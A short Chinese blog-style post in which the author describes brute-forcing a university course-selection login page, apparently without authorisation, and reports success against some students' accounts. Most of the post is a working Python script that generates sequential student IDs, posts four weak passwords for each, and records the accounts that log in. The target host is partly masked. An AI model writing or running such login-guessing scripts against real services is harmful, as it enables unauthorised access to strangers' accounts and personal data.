这俩天突然想到,如果用python写一个登陆脚本,用一堆账号然后设定几个弱密码进行登陆,能不能获取到‘一些信息’。
1.找到某高校官网,发现有一个选课系统登陆页面
2.于是用chrome找到登陆请求
3.设定弱密码
pd=['123456','1234567','12345678','123456789']
4.开始疯狂爆破
#!/usr/bin/python3 #coding:utf8 import sys import time from bs4 import BeautifulSoup import requests def bp(id,pd): w=open('password','r+') w.read() w.write('密码是'+pd+':\n') url='http://*****.cn:8080/jwcmis/zyxk/index.jsp' headers={ 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Host':'*****.cn:8080', 'Origin':'http://******.cn:8080' } for i in range(12): if i < 10: studentid = id+'0' else: studentid=id studentid+=str(i) sdd=studentid for n in range(30): studentid=sdd if n > 9: studentid+=str(n) else: studentid+='0'+str(n) postdata={ 'studentid':studentid, 'password':pd, 'Submit':'(unable to decode value)' } req=requests.Session() html=req.post(url=url,data=postdata,headers=headers) html=html.content.decode("gb2312") soup=BeautifulSoup(html,'html.parser') s=soup.find('div').find('p') su=str(s) if len(su) is 49: print(su,studentid) w.write(str(studentid)+'\n') time.sleep(0.5) w.close() if __name__=='__main__': pd=['123456','1234567','12345678','123456789'] for p in pd: print(p) bp('2014211001',pd=p)
5.跑了几分钟,果然有些学生用了上面的弱密码,有些东西就涂掉了,,重点看上面代码,‘——’